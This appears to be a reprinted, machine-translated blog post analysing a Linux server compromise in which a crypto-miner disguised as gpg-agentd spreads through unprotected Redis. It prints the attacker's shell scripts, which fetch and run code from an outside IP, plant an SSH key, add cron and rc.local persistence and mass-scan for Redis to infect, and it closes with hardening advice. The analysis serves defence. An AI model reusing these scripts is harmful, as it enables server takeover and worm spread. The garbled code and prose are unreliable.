0 x00 background
When I arrived at the office on Monday morning, I heard from my colleague that there was a server that could not be logged in. I did not take it to heart and continued to eat breakfast while watching whether the currency price dropped again. Soon the operation and maintenance colleagues also arrived, panting and saying: we have a server frozen by Ali Cloud, the reason: malicious outsourcing. I put down the pickled cabbage bun, SSH connection, was rejected, asked the default port 22 is blocked. I asked my operation and maintenance colleagues to change the port and immediately connect it. By the way, I looked at the login name :root and the small white password with less than 8 digits. I felt a chill in my heart: it was hacked!
0x01 Search for clues
Mysql > alter database (gpg-agentd); mysql > alter database (gpg-agentd); mysql > alter database (gpg-agentd);
Google GPG and it says:
The GPG-Agent provided by GPG supports the SSH protocol, which greatly simplifies key management.
It looks like a serious program, but if you take a closer look at the process on the server it is followed by a letter D, which is nicely disguised and reminiscent of various Windows viruses that look like Svchost.exe. Continue to
ps eho command -p 23374
netstat -pan | grep 23374
Copy the codeCheck the PID :23374 process startup path and network health, which brings you to the directory in Figure 1, where you have found the binary executable left by the hacker. Two more questions await me:
1. How are files uploaded?
2. What is the purpose of this file, or what does the hacker want?
The record has been wiped out, leaving no trace. Continue the command more messages,
I saw a lot of software installed on the server around midnight, and a few of them caught my attention, which I’ll talk about in more detail. And I guess, if we were going to do something bad, where would it be? Automatic? Timed start? Yeah, plan the mission.
crontab -e
Copy the code
Sure enough, the clue was found.
0x02 Motive
The scheduled task above means downloading a script from the server and executing it every 15 minutes. Let’s download the script and take a look.
Curl -fssl 159.89.190.243/ash.php > ash.shCopy the codeThe script content is as follows:
uname -a id hostname setenforce 0 2>/dev/null ulimit -n 50000 ulimit -u 50000 crontab -r 2>/dev/null rm -rf /var/spool/cron/* 2>/dev/null mkdir -p /var/spool/cron/crontabs 2>/dev/null mkdir -p /root/.ssh 2>/dev/null echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKm Mza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc 2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/G N3 + ThY + PNUqx redisX '> / root /. SSH/authorized_keys echo' 15 * * * * * / curl - fsSL 159.89.190.243 / ash. PHP | sh '> The/var/spool/cron/root echo '20 * * * * * / curl - fsSL 159.89.190.243 / ash. PHP | sh' > / var/spool/cron/crontabs/root yum install -y bash 2>/dev/null apt install -y bash 2>/dev/null apt-get install -y bash 2>/dev/null bash -c 'curl -fsSL 2 > 159.89.190.243 / BSH. PHP | bash '/ dev/nullCopy the codeHere’s an overview of the main uses of this script:
The SSH public key is generated in /root/.ssh/authorized_keys file, so that every time a hacker logs in to the server, he can log in password free, and execute the script is much easier. See this article for an article on SSH Keys
SSH principle and application. Next, install bash, and finally proceed to download the second script, bsh.php, and execute it.
Go ahead and download and analyze bsh.pbp as follows:
sleep $( seq 3 7 | sort -R | head -n1 ) cd /tmp || cd /var/tmp sleep 1 mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd .ICE-unix/... sleep 1 if [ -f .watch ]; then rm -rf .watch exit 0 fi sleep 1 echo 1 > .watch sleep 1 ps x | awk '! /awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null ps x | awk '! /awk/ && /barad_agent|masscan|\.sr0|clay|udevs|\.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null sleep 1 if ! [ -x /usr/bin/gpg-agentd ]; Then curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db echo '/usr/bin/gpg-agentd' > /etc/rc.local echo 'curl -fssl 159.89.190.243 / ash. PHP | sh '> > / etc/rc. The local echo' exit 0 '> > / etc/rc. Local fi sleep 1 chmod + x/usr/bin/GPG - agentd && /usr/bin/gpg-agentd || rm -rf /usr/bin/gpg-agentd sleep 1 if ! [ -x "$(command -v masscan)" ]; then rm -rf /var/lib/apt/lists/* rm -rf x1.tar.gz if [ -x "$(command -v apt-get)" ]; then export DEBIAN_FRONTEND=noninteractive apt-get update -y apt-get install -y debconf-doc apt-get install -y Build -essential apt-get install -y libpcap0.8-dev libpcap0.8 apt-get install -y libpcap* apt-get install -y make GCC git apt-get install -y redis-server apt-get install -y redis-tools apt-get install -y redis apt-get install -y iptables apt-get install -y wget curl fi if [ -x "$(command -v yum)" ]; then yum update -y yum install -y epel-release yum update -y yum install -y git iptables make gcc redis libpcap libpcap-devel yum install -y wget curl fi sleep 1 curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz sleep 1 [-f x1. Tar. Gz] && tar ZXF x1, tar, gz & CD Masscan-1.0.4 && make && make install && CD.. && rm - rf masscan - 1.0.4 fi sleep 3 && rm - rf. Watch bash - c 'curl - fsSL 159.89.190.243 / RSH. PHP | bash' 2 > / dev/nullCopy the codeThe code in this script is quite long, but it has four main functions:
1, download remote code to local, add execute permission, chmod u+x.
2, modify rc.local to make the local code automatically execute upon startup.
Download the open source scanner on Github
code”And install the relevant dependency software, which is the record I saw in messages above.
4. Download the third script and execute it.
I went to Github to take a look at the open source code and it blew my mind.
MASSCAN: Mass IP port scanner
This is the fastest Internet port
scanner. It can scan the entire Internet in under 6 minutes, >
transmitting 10 million packets per second.
It produces results similar to nmap, the most famous port scanner.
Internally, it operates more > like scanrand, unicornscan, and ZMap,
using asynchronous transmission. The major difference is > that it’s
faster than these other scanners. In addition, it’s more flexible,
allowing arbitrary > address ranges and port ranges.
NOTE: masscan uses a custom TCP/IP stack. Anything other than simple
port scans will cause conflict with the local TCP/IP stack. This means
you need to either use the -S option to use a separate IP address, or
configure your operating system to firewall the ports that masscan uses.
Transmitting 10 million packets per second is faster than NMAP, so it is not difficult to understand why Ali Cloud froze the server. After reading the readme, I did not continue to download the third script.
setenforce 0 2>/dev/null ulimit -n 50000 ulimit -u 50000 sleep 1 iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null iptables -I INPUT 1 -p TCP --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null sleep 1 rm -rf-dat.shard .ranges .lan 2>/dev/null sleep 1 echo 'config set dbfilename "backup.db"' > .dat echo 'save' >> .dat echo 'flushall' >> . Dat echo 'set backup1 "\ n \ n \ n 2 * * * * * / curl - fsSL http://159.89.190.243/ash.php | sh \ n \ n"' > >. The dat echo 'set backup2 "\ n \ n \ n 3 * * * * * / wget - q - O - | sh \ n \ n" http://159.89.190.243/ash.php "> >. The dat echo 'set backup3" \ n \ n \ n * * * * * / 4 The curl - fsSL http://159.89.190.243/ash.php | sh \ n \ n "' > >. The dat echo 'set backup4" \ n \ n \ n 5 * * * * * / wget - q - O - http://159.89.190.243/ash.php | sh \ n \ n "' > >. The dat echo 'config set dir"/var/spool/cron/"' > >. The dat echo 'config set dbfilename "root"' >> .dat echo 'save' >> .dat echo 'config set dir "/var/spool/cron/crontabs"' >> .dat echo 'save' >> . Dat sleep 1 masscan - Max - rate 10000 - p6379, 6380 - shard $1 22000 | (seq sort - R | head - n1) / 22000 - exclude 2 > / dev/null 255.255.255.255 0.0.0.0/0 | awk '{print $6, substr ($4, 1, length($4)-4)}' | sort | uniq > .shard sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .shard sleep 1 masscan --max-rate 10000 - p6379, 6380 192.168.0.0/16 along / 16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2 > / dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .ranges sleep 1 ip a | grep -oE '([0-9] {1, 3}.?) {4} / [0-9] {2} '2 > / dev/null | sed' s / \ \ (\ [0-9] {2 \} \] / \ / 16 / g '>. Inet sleep 1 masscan - Max - rate 10000 - p6379, 6380 - iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .lan sleep 60 rm -rf .dat .shard .ranges .lan 2>/dev/nullCopy the codeIf the first two scripts simply download and execute binaries on the server, then this script really shows the power of the virus. Let’s examine the script.
There is nothing to be said for the initial modification of the system environment. The next step is to write a file that looks familiar. If you have used Redis, you can guess that this is configuring Redis. / root/ssh/authorized_keys /root/ ssh/authorized_keys /root/ ssh/authorized_keys Once logged in, periodically perform scheduled tasks and download scripts. If your redis listening port is a public IP address or 0.0.0.0, and there is no password protection, sorry, you are in for a hookup.
0 x03 summary
By analyzing these three scripts in turn, we can see the horror of this virus. First, it obtains login permission by writing SSH public key, then downloads and executes remote binary files, and finally replicates through redis vulnerability, rapidly spreading across the network and growing at an exponential speed. So the question is, how did this server get hacked? Redis.conf: bind is 127.0.0.1. To test my belief, I took a look at lastb, and sure enough, there were plenty of records:
Just one last question, what exactly does this GPG-AgentD program do? At that time, my first reaction was mining machine, because now digital currency is so popular, increasing the demand for distributed mining machine, which also gave birth to this gray industry chain. Drag the GPG-agentd into IDA and search for bitcoin, eth, mine, etc., using string.
Take a look at nicehash.com and everything is clear.
0x04 Security Suggestion
I. Server
1. Disable ROOT
2. Keep the user name and password complex
3. Change the default SSH port 22
4. Install the DenyHosts anti-brute-force cracking software
5. Disable password login and use the RSA public key to log in
Second, the redis
1. Disable public IP listening, including 0.0.0.0
2, use password to restrict access to Redis
3. Run Redis with a lower permission account
If you are interested in the sample, you can also go to curl or run the above script on a virtual machine. In view of my limited ability, the text will inevitably appear negligence or error, but also please correct.
This article is reprinted by Hefe watch Snow forum please specify from Watch Snow community